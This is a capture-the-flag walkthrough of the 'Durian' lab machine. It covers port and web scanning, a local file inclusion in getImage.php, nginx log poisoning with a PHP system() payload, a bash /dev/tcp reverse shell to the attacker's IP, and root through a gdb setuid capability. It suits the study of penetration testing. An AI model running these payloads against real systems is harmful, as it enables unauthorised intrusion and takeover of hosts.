Durian
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon durian.vuln
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-20 13:11 EST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:11
Completed NSE at 13:11, 0.00s elapsed
Initiating ARP Ping Scan at 13:11
Scanning durian.vuln (10.0.2.49) [1 port]
Completed ARP Ping Scan at 13:11, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:11
Scanning durian.vuln (10.0.2.49) [65535 ports]
Discovered open port 80/tcp on 10.0.2.49
Discovered open port 22/tcp on 10.0.2.49
Discovered open port 7080/tcp on 10.0.2.49
Discovered open port 8000/tcp on 10.0.2.49
Discovered open port 8088/tcp on 10.0.2.49
Completed SYN Stealth Scan at 13:11, 1.49s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.49.
Initiating NSE at 13:11
Completed NSE at 13:11, 0.00s elapsed
Nmap scan report for durian.vuln (10.0.2.49)
Host is up (0.000066s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
7080/tcp open empowerid
8000/tcp open http-alt
8088/tcp open radan-http
MAC Address: 08:00:27:95:CF:1A (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 13:11
Completed NSE at 13:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.76 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[i] [WHATWEB]
http://durian.vuln:80 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.0.2.49], Title[Durian]
[+] [WFUZZ]
*stage 1 --> (light web path fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://durian.vuln:80/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 20 L 51 W 765 Ch "http://durian.vuln:80/"
000000646: 301 9 L 28 W 309 Ch "blog"
000000822: 301 9 L 28 W 313 Ch "cgi-data"
000002020: 200 20 L 51 W 765 Ch "index.html"
000000013: 403 9 L 28 W 276 Ch ".htpasswd"
000000012: 403 9 L 28 W 276 Ch ".htaccess"
000000011: 403 9 L 28 W 276 Ch ".hta"
000003588: 403 9 L 28 W 276 Ch "server-status"
Total time: 0
Processed Requests: 4614
Filtered Requests: 4606
Requests/sec.: 0
*stage 2 --> (light permutated extensions fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://durian.vuln:80/FUZZ.FUZ2Z
Total requests: 13842
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 403 9 L 28 W 276 Ch "php"
000000031: 403 9 L 28 W 276 Ch ".hta - php"
000000039: 403 9 L 28 W 276 Ch ".htpasswd - txt"
000000037: 403 9 L 28 W 276 Ch ".htpasswd - php"
000000032: 403 9 L 28 W 276 Ch ".hta - html"
000000033: 403 9 L 28 W 276 Ch ".hta - txt"
000000034: 403 9 L 28 W 276 Ch ".htaccess - php"
000000035: 403 9 L 28 W 276 Ch ".htaccess - html"
000000036: 403 9 L 28 W 276 Ch ".htaccess - txt"
000000002: 403 9 L 28 W 276 Ch "html"
000000038: 403 9 L 28 W 276 Ch ".htpasswd - html"
000006050: 200 20 L 51 W 765 Ch "index - html"
Total time: 0
Processed Requests: 13842
Filtered Requests: 13830
Requests/sec.: 0
[i] [WHATWEB]
http://durian.vuln:8000 [200 OK] Country[RESERVED][ZZ], HTTPServer[nginx/1.14.2], IP[10.0.2.49], Title[Durian], nginx[1.14.2]
[+] [WFUZZ]
*stage 1 --> (light web path fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://durian.vuln:8000/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 20 L 51 W 765 Ch "http://durian.vuln:8000/"
000000646: 301 7 L 12 W 185 Ch "blog"
000000822: 301 7 L 12 W 185 Ch "cgi-data"
000002020: 200 20 L 51 W 765 Ch "index.html"
Total time: 0
Processed Requests: 4614
Filtered Requests: 4610
Requests/sec.: 0
*stage 2 --> (light permutated extensions fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://durian.vuln:8000/FUZZ.FUZ2Z
Total requests: 13842
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000006050: 200 20 L 51 W 765 Ch "index - html"
Total time: 0
Processed Requests: 13842
Filtered Requests: 13841
Requests/sec.: 0
[i] [WHATWEB]
http://durian.vuln:8088 [200 OK] Country[RESERVED][ZZ], HTTPServer[LiteSpeed], IP[10.0.2.49], LiteSpeed, Title[Durian]
[+] [WFUZZ]
*stage 1 --> (light web path fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://durian.vuln:8088/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 20 L 51 W 765 Ch "http://durian.vuln:8088/"
000000012: 403 14 L 107 W 1227 Ch ".htaccess"
000000644: 301 14 L 109 W 1260 Ch "blocked"
000000819: 301 14 L 109 W 1260 Ch "cgi-bin"
000001114: 301 14 L 109 W 1260 Ch "css"
000001319: 301 14 L 109 W 1260 Ch "docs"
000002020: 200 20 L 51 W 765 Ch "index.html"
000001998: 301 14 L 109 W 1260 Ch "img"
000003188: 301 14 L 109 W 1260 Ch "protected"
Total time: 0
Processed Requests: 4614
Filtered Requests: 4605
Requests/sec.: 0
*stage 2 --> (light permutated extensions fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://durian.vuln:8088/FUZZ.FUZ2Z
Total requests: 13842
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004451: 200 11 L 25 W 195 Ch "error404 - html"
000006050: 200 20 L 51 W 765 Ch "index - html"
000012619: 200 35 L 202 W 1770 Ch "upload - php"
000012620: 200 198 L 533 W 6520 Ch "upload - html"
Total time: 0
Processed Requests: 13842
Filtered Requests: 13838
Requests/sec.: 0
recon reports port 22 for ssh, 80 for http, 7080 for empowerid, 8000 for http-alt and 8088 for radan-http. Additionally loops between web services to obtain some server folders
┌──(root@ghost)-[/home/ghost]
└─# curl http://durian.vuln/cgi-data/getImage.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
/*
</?php include $_GET['file']; */
</body>
</html>
After inspect the content of cgi-data we found a possible local file inclusion in getImage.php file
┌──(root@ghost)-[/home/ghost]
└─# curl http://durian.vuln/cgi-data/getImage.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
durian:x:1000:1000:durian,,,:/home/durian:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
Here the LFI, after enumerating everything with lfienum we found some leaked logs and other usefull things
I made this machine a few times and there is a bunch of logs/ways to achive the following points, as /proc/self/fd/X way so I decided to complicate things and make it bit tricky. I found some nginx log with some kind of redirection so let's do this
┌──(root@ghost)-[/home/ghost]
└─# curl http://durian.vuln:8000/cgi-data/getImage.php?file=/var/log/nginx/access.log -H 'User-Agent: c4nV533w3'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
/*
</?php include $_GET['file']; */
</body>
</html>
We send our custom user agent to nginx port 8000
┌──(root@ghost)-[/home/ghost]
└─# curl http://durian.vuln/cgi-data/getImage.php?file=/var/log/nginx/access.log
...
10.0.2.43 - - [20/Dec/2022:13:34:05 -0500] "GET /cgi-data/getImage.php?file=/var/log/nginx/access.log HTTP/1.1" 200 270 "-" "c4nV533w3"
Then check log in port 80 and we can see it
┌──(root@ghost)-[/home/ghost]
└─# cat poison.py
import requests
headers = {
'User-Agent':"<?php system($_GET['cmd']); ?>"
}
r = requests.get('http://durian.vuln:8000/cgi-data/getImage.php?file=/var/log/nginx/access.log', headers=headers)
print (r)
┌──(root@ghost)-[/home/ghost]
└─# python3 poison.py
<Response [200]>
Same process, send poisoned header to port 8000
┌──(root@ghost)-[/home/ghost]
└─# curl "http://durian.vuln/cgi-data/getImage.php?file=/var/log/nginx/access.log&cmd=whoami"
...
10.0.2.43 - - [20/Dec/2022:14:41:51 -0500] "GET /cgi-data/getImage.php?file=/var/log/nginx/access.log HTTP/1.1" 200 270 "-" "www-data"
...
And send command to port 80 we can see that we have command execution
┌──(root@ghost)-[/home/ghost]
└─# curl "http://durian.vuln/cgi-data/getImage.php?file=/var/log/nginx/access.log&cmd=bash%20-c%20%27bash%20-i%20>%26%20/dev/tcp/10.0.2.43/1337%200>%261%27%26"
Time to get a shell in system, with your listener set first
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.43] from durian.vuln [10.0.2.52] 40232
bash: cannot set terminal process group (465): Inappropriate ioctl for device
bash: no job control in this shell
www-data@durian:/var/www/html/cgi-data$
Time to get root privileges
www-data@durian:/var/www/html/cgi-data$ getcap -r / 2>/dev/null
/usr/bin/gdb = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
Find vulnerable capabilities, there is a payload for this in gtfobins
www-data@durian:/var/www/html/cgi-data$ /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
...
For help, type "help".
Type "apropos word" to search for commands related to "word".
whoami
root
cat /root/proof.txt
SunCSR_Team.af6d45da1f1181347b9e2139f23c6a5b
And we are root